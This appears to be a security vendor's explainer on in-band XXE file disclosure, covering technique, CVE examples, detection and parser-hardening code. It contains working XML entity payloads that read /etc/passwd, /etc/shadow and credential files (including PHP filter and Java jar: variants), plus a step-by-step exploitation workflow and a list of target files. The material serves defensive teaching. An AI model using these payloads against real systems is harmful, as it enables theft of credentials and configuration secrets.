In-band XXE that reads arbitrary server files via the file:// scheme and returns their contents directly in the XML response, exposing credentials and configuration.
TL;DR
file:// scheme reads arbitrary server files and returns contents inline in the XML response<!ENTITY xxe SYSTEM "file:///etc/passwd"> + &xxe; in document body/etc/passwd, wp-config.php, .env, application.properties, ~/.aws/credentialsdisallow-doctype-decl: true)Classic XXE file disclosure is the in-band variant of XML External Entity injection: the attacker defines an external entity pointing to a file:// URI, embeds a reference to that entity in the XML body, and the server returns the file contents directly in the HTTP response. The entire attack — delivery and exfiltration — flows through the same HTTP channel, making it the simplest and most immediately impactful XXE technique.
The flaw (CWE-611) exists at the parser configuration layer, not in application logic. An XML parser with default settings — Java's DocumentBuilderFactory, or PHP's DOMDocument with LIBXML_NOENT — processes <!DOCTYPE> declarations and resolves SYSTEM entity URIs during the parse phase, before the application code ever sees the document content. Note: Python's xml.etree.ElementTree raises ExpatError on external entity declarations and does not resolve them (safe for XXE), but it remains vulnerable to Billion Laughs DoS — use defusedxml for full protection. The application then uses the parsed document tree, unaware that entity substitution replaced &xxe; with the contents of /etc/passwd.
Under OWASP A05:2021 (Security Misconfiguration), this vulnerability is classified as a configuration failure rather than a code-level injection flaw. The fix is a parser configuration change, not application logic refactoring. Yet classic XXE continues to appear in production systems because developers do not recognize XML parsers as a security-sensitive component requiring explicit hardening.
The attack sequence:
<!DOCTYPE> declaration defining a SYSTEM entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.&xxe; in any element the application reads and reflects — a username field, a product query, a search term.POST /api/users/profile HTTP/1.1
Host: app.example.com
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userInfo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<firstName>&xxe;</firstName>
<lastName>Doe</lastName>
</userInfo>HTTP/1.1 200 OK
Content-Type: application/json
{
"firstName": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...",
"lastName": "Doe"
}The entire /etc/passwd file content replaces the firstName value in the parsed document, and the application reflects it in the response.
| Target File | OS | Sensitivity | Common Content |
|---|---|---|---|
/etc/passwd | Linux | Medium | Usernames, UIDs, home dirs |
/etc/shadow | Linux | Critical | Hashed passwords (requires root) |
~/.aws/credentials | Linux | Critical | AWS access key + secret |
wp-config.php | Linux/Windows | Critical | MySQL credentials, auth keys |
application.properties | Linux | Critical | DB URL, API keys, secrets |
.env | Linux | Critical | All application secrets |
web.config | Windows | Critical | Connection strings, secrets |
C:\Windows\win.ini | Windows | Low | Confirms Windows + file:// access |
/proc/self/environ | Linux | High | Environment variables (secrets in env) |
Standard file:// reads fail on binary files and may truncate multi-line content with characters outside the XML character range. The PHP filter wrapper encodes content as base64:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
]>
<root><data>&xxe;</data></root>The response contains a base64 string. Decode offline: echo "BASE64STRING" | base64 -d. This technique reads binary files, SSH keys, and files containing null bytes that would break standard SYSTEM entity reads.
Java XML parsers support additional URI schemes beyond file://:
<!-- Read file from application classpath -->
<!ENTITY xxe SYSTEM "classpath:application.properties">
<!-- Read file from inside a JAR archive -->
<!ENTITY xxe SYSTEM "jar:file:///path/to/application.war!/WEB-INF/web.xml">The jar:// scheme can read any file inside the application's own WAR/JAR — useful for reading WEB-INF/web.xml, applicationContext.xml, or Spring application.properties when their filesystem paths are unknown.
<!-- Older Java parsers: netdoc:// as alternative to file:// -->
<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS 9.8)
The definitive 2024 example of in-band XXE chaining to RCE. The attack reads app/etc/env.php, a PHP configuration file containing the Magento crypt/key. This key is used to sign admin JWTs. With the key extracted, the attacker forges an admin authentication token, accesses the admin REST API, and achieves code execution. More than 4,275 stores were compromised within 72 hours. The file read is the first step of the chain — not the final impact.
CVE-2024-30043 — Microsoft SharePoint Server (CVSS 6.5)
Authenticated SharePoint users could submit XML-based requests that triggered in-band file disclosure. The vulnerability exposed SharePoint server configuration files and internal path information. Patched in the June 2024 Patch Tuesday, it illustrates that even enterprise Microsoft products require explicit parser hardening.
CVE-2025-49493 — Akamai CloudTest SOAP Services (CVSS 9.1)
Multiple SOAP endpoints in Akamai's CloudTest platform returned file content in SOAP fault responses when XML entity payloads were submitted. The SOAP fault mechanism reflected the entity value as part of the error message, making this an in-band variant even though the file content appeared in an error response rather than a normal response body.
HackerOne #293795 — Uberflip REST API (High)
A REST API endpoint accepted XML bodies without entity restrictions. The researcher confirmed file disclosure by retrieving /etc/passwd content directly in the API response. Follow-up payloads read application configuration files. This report is representative of the most common discovery path: REST API accepting application/xml with no parser hardening.
Confirm XML acceptance with a baseline request (non-XXE). Check for 415 vs any other status.
Test entity expansion with an internal canary:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY-8675309">]>
<root><field>&test;</field></root>If XXECANARY-8675309 appears in the response body, entity expansion is active.
Escalate to a SYSTEM entity with a safe, non-sensitive file:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///proc/version">]>
<root><field>&xxe;</field></root>Linux kernel version string appearing in the response confirms SYSTEM entity file read.
Identify a target file based on the application stack:
file:///var/www/html/wp-config.php, file:///var/www/html/.envfile:///app/application.properties, file:///app/application.ymlfile:///app/settings.pyfile:///C:/inetpub/wwwroot/web.configAttempt the PHP filter wrapper for files that may contain binary content:
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">Burp Suite Pro active scanner submits internal entity canaries and checks for reflection. For in-band XXE, it verifies the canary appears in the response body across all XML-accepting endpoints in scope.
Nuclei templates in vulnerabilities/xxe/ include in-band detection templates that use unique markers and verify response reflection.
BreachVex detects classic file disclosure after first confirming entity expansion: it submits a SYSTEM entity referencing /etc/passwd and checks for known file-read markers (root:x:0:0, daemon:x:) in the response body. A high-confidence match is auto-reported.
// Java — one configuration block eliminates all in-band XXE
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setExpandEntityReferences(false);# Python — replace stdlib xml with defusedxml (drop-in safe replacement)
# pip install defusedxml
from defusedxml import ElementTree as ET # replaces import xml.etree.ElementTree as ET
tree = ET.parse(xml_file) # file:// SYSTEM entities blocked automatically// .NET — prohibit DTD and null the resolver
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);// PHP — never pass LIBXML_NOENT; use LIBXML_NONET at minimum
// PHP 8.0+ external entity loading is off by default for DOMDocument
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET); // blocks http:// entities; also blocks file:// in PHP 8.0+When DOCTYPE disabling is not possible (e.g., third-party library without parser configuration access), reject documents containing DOCTYPE:
import re
def reject_if_doctype(xml_input: str) -> None:
"""Reject XML containing DOCTYPE declarations — last-resort defense."""
if re.search(r'<!DOCTYPE', xml_input, re.IGNORECASE):
raise ValueError("DOCTYPE declarations are not permitted")Blocklist patterns for <!DOCTYPE are not a reliable primary defense. They can be bypassed via UTF-16 encoding, encoding tricks, or by using XInclude (which does not use DOCTYPE). Parser-level configuration is the only reliable control.
Any file readable by the operating system user running the XML-processing service. Common targets: /etc/passwd (user enumeration), /etc/shadow (password hashes, if root), application config files (wp-config.php, application.properties, .env, database.yml), SSH private keys (~/.ssh/id_rsa), cloud credentials (~/.aws/credentials), and Java keystores. On Windows: C:\Windows\System32\drivers\etc\hosts, web.config, applicationHost.config.
A SYSTEM entity is an XML external entity declaration that references a URI using the SYSTEM keyword: <!ENTITY name SYSTEM 'URI'>. When the parser encounters &name; in the document body, it fetches the URI content and substitutes it inline. URI schemes supported by most parsers include file://, http://, https://, and ftp://. The SYSTEM keyword distinguishes external entities (which fetch URIs) from internal entities (which define literal string values).
Classic in-band file disclosure returns the file content directly in the HTTP response — the attacker reads it immediately. Blind OOB XXE exfiltrates content via a side channel (DNS or HTTP callback) when the application does not reflect the parsed entity value. Classic is simpler to exploit but easier to detect; blind OOB is more common in practice because modern applications rarely reflect raw XML entity values.
A two-step approach: first test entity expansion with an internal entity (<!ENTITY test 'XXECANARY123'>) — if XXECANARY123 appears in the response, entity expansion is confirmed. Then escalate to a SYSTEM entity: <!ENTITY xxe SYSTEM 'file:///etc/passwd'>. If /etc/passwd content appears, classic file disclosure is confirmed. BreachVex uses unique per-probe canary tokens to prevent cross-probe false positives.
Partially. XML requires well-formed UTF-8 or UTF-16 text. Binary files containing bytes outside the valid XML character range cause parser errors and may truncate the response. Binary files can be read via PHP filter wrappers (php://filter/convert.base64-encode/resource=...) which encode the content as base64 before substitution. Java parsers may also handle this via custom resolvers, but standard setups cannot reliably read arbitrary binary files inline.
CVE-2024-30043 (Microsoft SharePoint, CVSS 6.5) — authenticated attacker reads files from the SharePoint server filesystem. CVE-2025-49493 (Akamai CloudTest, CVSS 9.1) — SOAP endpoints return file contents in SOAP fault responses. CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8) — reads app/etc/env.php to extract the crypt key for an RCE chain. CVE-2025-13096 (IBM BAW, CVSS 8.2) — XML processing exposes internal configuration.
Windows file URIs use the format file:///C:/path/to/file or file:///C:\path\to\file (with forward slashes: file:///C:/Windows/System32/drivers/etc/hosts). Both UNC paths (file://SERVER/share/file) and local paths work on Java/Xerces and MSXML parsers. Windows-specific targets include C:\Windows\win.ini, C:\inetpub\wwwroot\web.config, C:\Users\<username>\.aws\credentials, and C:\Program Files\Apache Tomcat\conf\server.xml.
HTTP 400 Bad Request with error text like 'DOCTYPE not allowed', 'DTD is prohibited', or 'Feature disallow-doctype-decl is enabled' indicates the parser is hardened against DOCTYPE. HTTP 400 with 'External entity' or 'Disallowed URI scheme' indicates entity resolution is blocked. HTTP 415 Unsupported Media Type means the endpoint does not accept XML at all. An HTTP 200 with the application's normal response (but without file content) may indicate entity expansion is disabled but the document was otherwise processed.
Use a non-sensitive, always-present file: on Linux, /proc/version (kernel version string) or /proc/sys/kernel/hostname (hostname) are safe to read and confirm file:// access without exposing credentials. On Windows, C:\Windows\System32\drivers\etc\hosts is low-sensitivity. Alternatively, use a local entity with a unique canary string first, then escalate to a known-safe file to confirm SYSTEM entity resolution before targeting sensitive paths.
PHP filter wrappers allow reading binary or multi-line files by encoding them as base64: <!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/etc/passwd'>. The parser fetches the PHP stream, which base64-encodes the file content. The response contains a base64 string that the attacker decodes offline. This technique bypasses the XML well-formedness restriction on binary content and handles files containing newlines or null bytes that would otherwise truncate standard SYSTEM entity reads.
SOAP-based enterprise services (Java CXF, Apache Axis2, WCF) built before 2015 often have unconfigured parsers. WordPress sites exposing xmlrpc.php. Applications built on Spring Boot with Jackson-dataformat-xml (older versions). Any application using Java's javax.xml.parsers.DocumentBuilder without setting disallow-doctype-decl. Adobe Commerce / Magento installations pre-CVE-2024-34102 patch. SAP ABAP SOAP services. Oracle E-Business Suite XML endpoints.